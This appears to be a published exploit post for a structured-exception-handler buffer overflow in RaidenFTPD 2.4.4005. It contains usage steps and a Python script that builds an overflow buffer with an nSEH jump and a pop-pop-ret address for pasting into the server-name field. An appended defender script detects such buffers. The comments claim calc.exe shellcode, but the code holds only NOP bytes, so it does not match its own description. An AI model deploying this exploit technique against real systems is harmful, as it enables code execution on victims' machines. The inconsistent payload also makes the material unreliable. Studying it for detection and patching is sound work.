RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

HackApt-37 Team (verified member)

# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click "Setup" - 'Step by step setup wizard'
# 3.- Run the Python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field "Server name"
# 5.- Click "Next" - 'Next' - 'OK'
# 6.- Pop calc.exe

#!/usr/bin/env python3
from struct import pack

crash = 2000   # total length of the generated buffer
offset = 497   # filler bytes placed before the nseh/seh values

# msfvenom -p windows/exec cmd='calc.exe' -a x86 -f python -v shellCode -b '\x00\x00\x0d'
shellCode = b'\x90' * 8
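nseh = b'\xeb\x06\x90\x90'  # short jump of 8 bytes
# '<L' packs exactly 4 little-endian bytes (native 'l' is 8 bytes on 64-bit Linux)
seh = pack('<L', 0x7c1e76ff)  # pop eax; pop esi; ret; => msvcp70.dll

buffer = b'a' * offset
buffer += nseh
buffer += seh
buffer += shellCode
buffer += b'd' * (crash - len(buffer))  # pad to the full crash length

file_payload = open('exploit-raiden.txt', 'wb')
print('[*] Creating the .txt file for the payload')
file_payload.write(buffer)
print('[*] Writing malicious payload to the .txt file')
file_payload.close()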
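
A defender-side check for the buffer layout the script above builds, as an added example that is not part of the original post: it flags an over-long field value that carries an SEH record (a short jump followed by a handler pointer). `MAX_NAME_LEN`, `triage_field` and `build_sample` are hypothetical names, and the 64-byte limit is an assumption.

```python
import re
import struct

MAX_NAME_LEN = 64  # assumption: a sane upper bound for a server display name
# SEH record shape: short jump (EB disp8) + two filler bytes, then a 4-byte handler pointer
SEH_RECORD = re.compile(rb'\xeb([\x01-\x7f])..(.{4})', re.DOTALL)


def triage_field(data: bytes) -> dict:
    """Return findings for a byte string destined for a text field."""
    findings = {
        'length': len(data),
        'oversized': len(data) > MAX_NAME_LEN,
        'non_printable': sum(1 for b in data if b < 0x20 or b > 0x7e),
        'seh_records': [],
    }
    for m in SEH_RECORD.finditer(data):
        handler = struct.unpack('<L', m.group(2))[0]
        # Keep only plausible 32-bit user-mode code addresses without NUL bytes
        if 0x00400000 <= handler < 0x80000000 and b'\x00' not in m.group(2):
            findings['seh_records'].append(
                {'offset': m.start(), 'jump': m.group(1)[0], 'handler': hex(handler)})
    # Length alone is a weak signal; require binary content or an SEH record as well
    findings['suspicious'] = findings['oversized'] and (
        bool(findings['seh_records']) or findings['non_printable'] > 0)
    return findings


def build_sample() -> bytes:
    # Constructed sample: same layout as the page's buffer, with inert 0xCC
    # filler where the page's script places its payload.
    sample = b'a' * 497 + b'\xeb\x06\x90\x90' + struct.pack('<L', 0x7c1e76ff)
    sample += b'\xcc' * 16
    return sample + b'd' * (2000 - len(sample))


if __name__ == '__main__':
    print(triage_field(build_sample()))
    print(triage_field(b'Office FTP server'))
```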
 